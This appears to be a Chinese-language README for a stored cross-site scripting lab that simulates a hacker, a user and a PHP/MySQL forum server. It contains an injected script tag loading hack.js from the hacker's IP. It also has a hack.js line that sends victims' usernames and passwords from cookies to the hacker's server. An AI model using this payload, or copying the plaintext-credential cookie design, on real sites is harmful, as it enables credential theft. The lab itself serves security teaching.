Windows, Linux
Apache HTTP Server, MySQL, PHP 7.0
本实验需要三部电脑以模仿Hacker, 正常用户和服务器。 在这实验中, Hacker需要安装 Apache和PHP, 而服务器三个软件都需要安装。 对于Windows, 把代码放到 Apache 的 DocumentRoot: C:\Apache24\htdocs 对于Linux,把代码放到 Apache 的 DocumentRoot: /var/www/html/ Hacker 和服务器的代码分别在 hack 和 webserver文件夹里。 然后, 在webserver/databaseAuth.txt 需要隔行分别提供MySQL的用户名和密码 然后,在/hack/hack.js里需要把代码进行修改 (第16行):script.src = 'http://#在这里写hacker的IP地址#/index.php?username=' + username + '&password='+password;
我门设定了用户 hacker 和他的密码位:78539816, 正常用户 jim123 和他的密码位:12345678 (这些可在createDatabase.sql 修改)。 每当用户登入到网站,服务器将会在cookies里记录用户名和密码。 首先, hacker在登入了网页后,在论坛的评论输入区输入恶意代码: <script type = "text/javascript" src = "http://#在这里写hacker的IP地址#/hack.js"></script> ,并注入到数据库里。这样,恶意代码只要数据库管里员一日没有发现,恶意代码将会永远存储在数据库。每当正常用户 在论坛里登入后再发评论,会显示到其他用户的评论,而在此时恶意代码将会执行,并把存放在正常用户客户端的Cookies发到Hacker,从而Hacker得到用户名和密码。